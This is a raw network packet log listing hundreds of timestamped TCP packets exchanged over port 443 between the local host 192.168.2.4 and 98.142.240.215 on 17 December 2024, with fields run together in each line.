                                                                                                                                                                              Dec 17, 2024 18:12:37.587327957 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.587338924 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.587425947 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.588754892 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.588819981 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.588829041 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.588876963 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.617396116 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.617464066 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.617486954 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.617639065 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.619609118 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.619674921 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.619683027 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.619765043 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.794914961 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.795048952 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.795078993 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.795553923 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.796996117 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.797097921 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.797113895 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.797322035 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.800081015 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.800158024 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.800174952 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.800319910 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.801615000 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.801668882 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.801673889 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.801841021 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.803960085 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.804025888 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.804032087 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.804208994 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.807059050 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.807132959 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.807138920 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.807322025 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.808626890 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.808707952 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.808713913 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.808876038 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.810951948 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.811022043 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.811028957 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.811201096 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.824801922 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.824882030 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.824887991 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.825046062 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.826972961 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.827048063 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.827054977 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.827254057 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.829245090 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.829314947 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.829320908 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.829511881 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.831559896 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.831626892 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.831634045 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.831788063 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.833887100 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.833956003 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.833961964 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.834006071 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.837047100 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.837116957 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.837122917 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.837337017 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.847965956 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.848071098 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.848078012 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.848522902 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.850132942 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.850240946 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.850258112 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.850442886 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.988657951 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.988734961 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.988754988 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.988826036 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.991561890 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.991645098 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.991651058 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.993169069 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.993479013 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.993547916 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.993555069 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.993607044 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.995501995 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.995562077 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.995568991 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.995734930 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.998533964 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.998610020 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.998616934 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.998678923 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.000190973 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.000258923 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.000264883 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.002528906 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.002602100 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.002609968 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.003279924 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.005530119 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.005604982 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.005611897 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.007396936 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.025017977 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.025084972 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.025093079 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.025312901 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.027983904 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.028074980 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.028081894 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.028155088 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.029597044 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.029663086 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.029669046 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.031382084 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.031892061 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.031960011 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.031965971 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.033540964 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.035024881 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.035098076 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.035104990 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.035218000 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.037255049 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.037326097 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.037333012 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.037415981 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.043304920 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.043364048 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.043371916 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.045903921 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.045917988 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.045923948 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.045953035 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.045979023 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.181112051 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.181355953 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.181375980 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.181421995 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.183079004 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.183149099 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.183154106 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.185039043 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.185488939 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.185547113 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.185553074 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.187788963 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.187855005 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.187863111 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.189040899 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.190167904 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.190237045 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.190242052 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.192504883 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.192591906 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.192600965 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.192637920 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.194751024 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.194842100 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.194849014 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.194889069 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.197101116 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.197165012 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.197171926 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.201035976 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.217318058 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.217395067 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.217401981 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.219566107 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.219649076 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.219655991 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.221064091 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.221882105 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.221949100 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.221954107 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.224199057 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.224261999 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.224267006 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.224308014 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.226483107 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.226540089 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.226546049 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.228904009 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.228962898 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.228970051 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.229010105 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.236413956 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.236506939 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.236515045 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.237037897 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.238447905 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.238522053 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.238527060 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.241031885 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.373445034 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.373531103 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.373558044 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.373609066 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.375901937 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.375976086 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.375982046 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.378123045 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.378196001 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.378221035 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.378271103 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.380644083 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.380734921 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.380742073 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.382896900 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.382957935 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.382965088 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.383008957 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.385029078 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.385096073 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.385102034 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.387362957 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.387372971 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.387434006 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.387439966 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.389689922 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.389750957 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.389758110 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.389806032 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.408942938 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.409030914 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.409040928 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.411143064 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.411770105 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.411847115 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.411853075 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.413034916 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.414288998 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.414355040 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.414361000 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.415355921 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.416553974 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.416624069 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.416630030 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.416799068 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.418745041 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.418817043 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.418823004 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.418961048 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.421091080 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.421206951 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.421214104 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.421348095 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.428662062 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.428781986 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.428809881 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.429158926 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.430773020 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.430856943 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.430866003 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.431066036 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.592617035 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.592710972 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.592744112 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.592905998 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.596390963 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.596456051 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.596465111 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.596513987 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.598340988 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.598404884 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.598412991 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.598483086 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.601289034 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.601349115 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.601356983 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.601418018 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.605151892 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.605222940 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.605232954 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.605289936 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.608019114 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.608103037 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.608110905 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.608202934 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.609944105 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.610023022 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.610030890 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.610080004 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.613881111 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.613971949 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.613981009 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.614028931 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.616718054 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.616801023 CET49731443192.168.2.498.142.240.215
